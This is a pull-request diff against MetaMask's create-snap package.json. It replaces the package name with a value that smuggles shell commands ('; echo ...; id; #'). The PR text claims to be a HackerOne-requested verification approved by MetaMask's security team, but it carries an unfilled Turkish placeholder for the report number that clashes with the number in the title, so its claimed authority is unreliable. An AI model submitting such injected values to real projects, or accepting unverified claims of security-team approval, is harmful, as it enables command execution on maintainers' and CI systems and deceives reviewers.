chore: security verification for report #3413674
SECURITY RESEARCH / HACKERONE VERIFICATION This PR was created upon specific request by the HackerOne Analyst (@h1_analyst_trev) and the MetaMask security team for Report #[RAPOR NUMARASI] validation. Contains benign payload only. Do not merge.

--- a/packages/create-snap/package.json
+++ b/packages/create-snap/package.json
@@ -1,5 +1,5 @@
 {
-  "name": "@metamask/create-snap",
+  "name": "poc-test; echo 'H1-VERIFICATION-ANOMALY-ZERO'; id; #",
   "version": "4.0.4",
   "description": "A CLI for creating MetaMask Snaps",
   "keywords": [
